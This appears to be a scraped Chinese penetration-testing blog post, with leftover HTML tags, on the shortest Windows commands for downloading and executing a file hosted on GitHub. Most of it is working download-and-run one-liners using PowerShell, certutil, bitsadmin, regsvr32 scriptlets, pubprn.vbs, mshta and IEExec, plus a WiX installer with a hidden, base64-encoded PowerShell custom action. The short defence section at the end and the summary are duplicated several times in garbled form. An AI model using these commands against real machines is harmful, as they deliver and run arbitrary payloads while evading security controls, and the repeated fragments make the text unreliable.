从Github下载文件的多种渗透技巧<\/h1>

0x00 前言<\/h2>
本文探讨在Windows环境下，通过cmd命令行从Github下载文件并执行的各种方法，目标是找出实现这一功能的最短代码。<\/p>

0x01 方法汇总<\/h2>

1. PowerShell方法<\/h3>

代码示例<\/strong>：<\/p>

(new-object System.Net.WebClient).DownloadFile('https:\/\/github.com\/3gstudent\/test\/raw\/master\/putty.exe'<\/span>,'c:\download\a.exe'<\/span>);start-process 'c:\download\a.exe'<\/span>
<\/span><\/span><\/code><\/pre>特点<\/strong>：<\/p>

直接使用.NET的WebClient类下载文件<\/li>
支持HTTPS协议<\/li>
可一行命令完成下载和执行<\/li>
<\/ul>
2. Certutil方法<\/h3>
代码示例<\/strong>：<\/p>
certutil -urlcache -split -f https:\/\/github.com\/3gstudent\/test\/raw\/master\/putty.exe c:\download\a.exe&&c:\download\a.exe
<\/code><\/pre>
特点<\/strong>：<\/p>

使用Windows内置的certutil工具<\/li>
支持HTTPS协议<\/li>
命令较短，适合快速执行<\/li>
<\/ul>
3. Bitsadmin方法<\/h3>
代码示例<\/strong>：<\/p>
bitsadmin \/transfer n http:\/\/github.com\/3gstudent\/test\/raw\/master\/putty.exe c:\download\a.exe && c:\download\a.exe
<\/code><\/pre>
特点<\/strong>：<\/p>

使用Windows后台智能传输服务(BITS)<\/li>
下载速度较慢<\/li>
注意：必须使用http而非https<\/li>
<\/ul>
4. Regsvr32方法<\/h3>
方法一<\/strong>：通过JScript调用PowerShell<\/p>
regsvr32 \/u \/s \/i:https:\/\/raw.githubusercontent.com\/3gstudent\/test\/master\/downloadexec.sct scrobj.dll
<\/code><\/pre>
方法二<\/strong>：通过VBScript直接下载执行<\/p>
regsvr32 \/u \/s \/i:https:\/\/raw.githubusercontent.com\/3gstudent\/test\/master\/downloadexec2.sct scrobj.dll
<\/code><\/pre>
VBScript实现代码<\/strong>：<\/p>
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.ServerXMLHTTP.6.0")
http.SetOption 2, 13056
http.open "GET","https:\/\/github.com\/3gstudent\/test\/raw\/master\/putty.exe",False
http.send
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile "c:\download\a.exe"
ado.Close
<\/code><\/pre>
特点<\/strong>：<\/p>

使用SCT脚本文件作为载体<\/li>
支持多种脚本语言实现(JScript\/VBScript)<\/li>
需要预先准备SCT文件<\/li>
<\/ul>
5. Pubprn.vbs方法<\/h3>
代码示例<\/strong>：<\/p>
cscript \/b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https:\/\/raw.githubusercontent.com\/3gstudent\/test\/master\/downloadexec3.sct
<\/code><\/pre>
特点<\/strong>：<\/p>

利用系统自带的pubprn.vbs脚本<\/li>
需要准备特定的SCT文件<\/li>
执行远程服务器上的脚本<\/li>
<\/ul>
6. Msiexec方法<\/h3>
实现步骤<\/strong>：<\/p>

将PowerShell命令Base64编码：<\/li>
<\/ol>
$fileContent = "(new-object System.Net.WebClient).DownloadFile('https:\/\/github.com\/3gstudent\/test\/raw\/master\/putty.exe','c:\download\a.exe');start-process 'c:\download\a.exe'"<\/span>
<\/span><\/span>$bytes = [System.Text.Encoding]<\/span>::Unicode.GetBytes($fileContent);
<\/span><\/span>$encoded = [System.Convert]<\/span>::ToBase64String($bytes);
<\/span><\/span>$encoded
<\/span><\/span><\/code><\/pre>
创建WIX安装包文件(msigen.wix)：<\/li>
<\/ol>
<?xml version="1.0"?><\/span>
<\/span><\/span><Wix<\/span> xmlns=<\/span>"http:\/\/schemas.microsoft.com\/wix\/2006\/wi"<\/span>><\/span>
<\/span><\/span>  <Product<\/span> Id=<\/span>"*"<\/span> UpgradeCode=<\/span>"12345678-1234-1234-1234-111111111111"<\/span> 
<\/span><\/span>           Name=<\/span>"Example Product Name"<\/span> Version=<\/span>"0.0.1"<\/span> 
<\/span><\/span>           Manufacturer=<\/span>"@_xpn_"<\/span> Language=<\/span>"1033"<\/span>><\/span>
<\/span><\/span>    <Package<\/span> InstallerVersion=<\/span>"200"<\/span> Compressed=<\/span>"yes"<\/span> Comments=<\/span>"Windows Installer Package"<\/span>\/><\/span>
<\/span><\/span>    <Media<\/span> Id=<\/span>"1"<\/span> \/><\/span>
<\/span><\/span>    <Directory<\/span> Id=<\/span>"TARGETDIR"<\/span> Name=<\/span>"SourceDir"<\/span>><\/span>
<\/span><\/span>      <Directory<\/span> Id=<\/span>"ProgramFilesFolder"<\/span>><\/span>
<\/span><\/span>        <Directory<\/span> Id=<\/span>"INSTALLLOCATION"<\/span> Name=<\/span>"Example"<\/span>><\/span>
<\/span><\/span>          <Component<\/span> Id=<\/span>"ApplicationFiles"<\/span> Guid=<\/span>"12345678-1234-1234-1234-222222222222"<\/span>><\/span>
<\/span><\/span>          <\/Component><\/span>
<\/span><\/span>        <\/Directory><\/span>
<\/span><\/span>      <\/Directory><\/span>
<\/span><\/span>    <\/Directory><\/span>
<\/span><\/span>    <Feature<\/span> Id=<\/span>"DefaultFeature"<\/span> Level=<\/span>"1"<\/span>><\/span>
<\/span><\/span>      <ComponentRef<\/span> Id=<\/span>"ApplicationFiles"<\/span>\/><\/span>
<\/span><\/span>    <\/Feature><\/span>
<\/span><\/span>    <Property<\/span> Id=<\/span>"cmdline"<\/span>><\/span>powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABsAG8AYQBkAFwAYQAuAGUAeABlACcA<\/Property><\/span>
<\/span><\/span>    <CustomAction<\/span> Id=<\/span>"SystemShell"<\/span> Execute=<\/span>"deferred"<\/span> Directory=<\/span>"TARGETDIR"<\/span> ExeCommand=<\/span>'[cmdline]'<\/span> Return=<\/span>"ignore"<\/span> Impersonate=<\/span>"no"<\/span>\/><\/span>
<\/span><\/span>    <CustomAction<\/span> Id=<\/span>"FailInstall"<\/span> Execute=<\/span>"deferred"<\/span> Script=<\/span>"vbscript"<\/span> Return=<\/span>"check"<\/span>><\/span>
<\/span><\/span>      invalid vbs to fail install
<\/span><\/span>    <\/CustomAction><\/span>
<\/span><\/span>    <InstallExecuteSequence><\/span>
<\/span><\/span>      <Custom<\/span> Action=<\/span>"SystemShell"<\/span> After=<\/span>"InstallInitialize"<\/span>><\/Custom><\/span>
<\/span><\/span>      <Custom<\/span> Action=<\/span>"FailInstall"<\/span> Before=<\/span>"InstallFiles"<\/span>><\/Custom><\/span>
<\/span><\/span>    <\/InstallExecuteSequence><\/span>
<\/span><\/span>  <\/Product><\/span>
<\/span><\/span><\/Wix><\/span>
<\/span><\/span><\/code><\/pre>
编译并执行：<\/li>
<\/ol>
candle.exe msigen.wix
light.exe msigen.wixobj
msiexec \/q \/i https:\/\/github.com\/3gstudent\/test\/raw\/master\/test.msi
<\/code><\/pre>
特点<\/strong>：<\/p>

使用Windows安装程序执行代码<\/li>
需要预先准备MSI文件<\/li>
执行后需要手动结束msiexec.exe进程<\/li>
<\/ul>
7. Mshta方法<\/h3>
标准方法<\/strong>：<\/p>
mshta https:\/\/raw.githubusercontent.com\/3gstudent\/test\/master\/calc.hta
<\/code><\/pre>
注意：Github返回的text\/plain头会导致此方法失败<\/em><\/p>
变通方法<\/strong>：<\/p>

将HTA文件托管在Github Pages（返回html头）<\/li>
执行：<\/li>
<\/ol>
mshta https:\/\/3gstudent.github.io\/test\/downloadexec.hta
<\/code><\/pre>
IE安全设置调整<\/strong>：<\/p>

IE浏览器 → Internet选项 → 安全<\/li>
自定义级别 → "通过域访问数据源" → 启用<\/li>
<\/ol>
优化方法<\/strong>：

使用PowerShell实现的HTA脚本可绕过安全限制：<\/p>
mshta https:\/\/3gstudent.github.io\/test\/downloadexec2.hta
<\/code><\/pre>
最短实现<\/strong>：

结合短网址服务，最短25字符：<\/p>
mshta http:\/\/t.cn\/RYUQyF8
<\/code><\/pre>
0x02 补充方法<\/h2>
IEExec方法（需管理员权限）<\/h3>
cd C:\Windows\Microsoft.NET\Framework\v2.0.50727\
caspol -s off
IEExec http:\/\/github.com\/3gstudent\/test\/raw\/master\/putty.exe
<\/code><\/pre>
限制<\/strong>：<\/p>

需要特定格式的exe文件<\/li>
Win7下可能失败<\/li>
<\/ul>
0x03 方法比较<\/h2>



方法<\/th>
字符数<\/th>
特点<\/th>
<\/tr>
<\/thead>


PowerShell<\/td>
较长<\/td>
功能强大，支持HTTPS<\/td>
<\/tr>

Certutil<\/td>
中等<\/td>
系统自带，支持HTTPS<\/td>
<\/tr>

Bitsadmin<\/td>
中等<\/td>
速度慢，仅HTTP<\/td>
<\/tr>

Regsvr32<\/td>
中等<\/td>
需要SCT文件<\/td>
<\/tr>

Pubprn.vbs<\/td>
较长<\/td>
系统自带脚本<\/td>
<\/tr>

Msiexec<\/td>
34(短网址)<\/td>
需要MSI文件<\/td>
<\/tr>

Mshta<\/td>
25(短网址)<\/td>
最短实现<\/td>
<\/tr>
<\/tbody>
<\/table>
0x04 防御建议<\/h2>

监控异常进程创建（certutil、bitsadmin等工具的非常规使用）<\/li>
限制PowerShell执行策略<\/li>
禁用或监控regsvr32、mshta等脚本宿主的异常使用<\/li>
监控MSI文件的异常安装行为<\/li>
保持IE安全设置处于适当级别<\/li>
<\/ol>
0x05 总结<\/h2>
从Github下载并执行文件的最短实现为mshta方法，仅需25个字符。各种方法各有优缺点，在实际渗透测试中可根据目标环境选择最适合的方法。防御方应重点关注这些常用系统工具的异常使用行为。<\/p>

方法<\/th>	字符数<\/th>	特点<\/th> <\/tr> <\/thead>
PowerShell<\/td>	较长<\/td>	功能强大，支持HTTPS<\/td> <\/tr>
Certutil<\/td>	中等<\/td>	系统自带，支持HTTPS<\/td> <\/tr>
Bitsadmin<\/td>	中等<\/td>	速度慢，仅HTTP<\/td> <\/tr>
Regsvr32<\/td>	中等<\/td>	需要SCT文件<\/td> <\/tr>
Pubprn.vbs<\/td>	较长<\/td>	系统自带脚本<\/td> <\/tr>
Msiexec<\/td>	34(短网址)<\/td>	需要MSI文件<\/td> <\/tr>
Mshta<\/td>	25(短网址)<\/td>	最短实现<\/td> <\/tr> <\/tbody> <\/table> 0x04 防御建议<\/h2> 监控异常进程创建（certutil、bitsadmin等工具的非常规使用）<\/li> 限制PowerShell执行策略<\/li> 禁用或监控regsvr32、mshta等脚本宿主的异常使用<\/li> 监控MSI文件的异常安装行为<\/li> 保持IE安全设置处于适当级别<\/li> <\/ol> 0x05 总结<\/h2> 从Github下载并执行文件的最短实现为mshta方法，仅需25个字符。各种方法各有优缺点，在实际渗透测试中可根据目标环境选择最适合的方法。防御方应重点关注这些常用系统工具的异常使用行为。<\/p>

从Github下载文件的多种渗透技巧<\/h1>

0x00 前言<\/h2> 本文探讨在Windows环境下，通过cmd命令行从Github下载文件并执行的各种方法，目标是找出实现这一功能的最短代码。<\/p>

0x01 方法汇总<\/h2>

0x02 补充方法<\/h2>

0x05 总结<\/h2> 从Github下载并执行文件的最短实现为mshta方法，仅需25个字符。各种方法各有优缺点，在实际渗透测试中可根据目标环境选择最适合的方法。防御方应重点关注这些常用系统工具的异常使用行为。<\/p>

0x00 前言<\/h2>
本文探讨在Windows环境下，通过cmd命令行从Github下载文件并执行的各种方法，目标是找出实现这一功能的最短代码。<\/p>

0x05 总结<\/h2>
从Github下载并执行文件的最短实现为mshta方法，仅需25个字符。各种方法各有优缺点，在实际渗透测试中可根据目标环境选择最适合的方法。防御方应重点关注这些常用系统工具的异常使用行为。<\/p>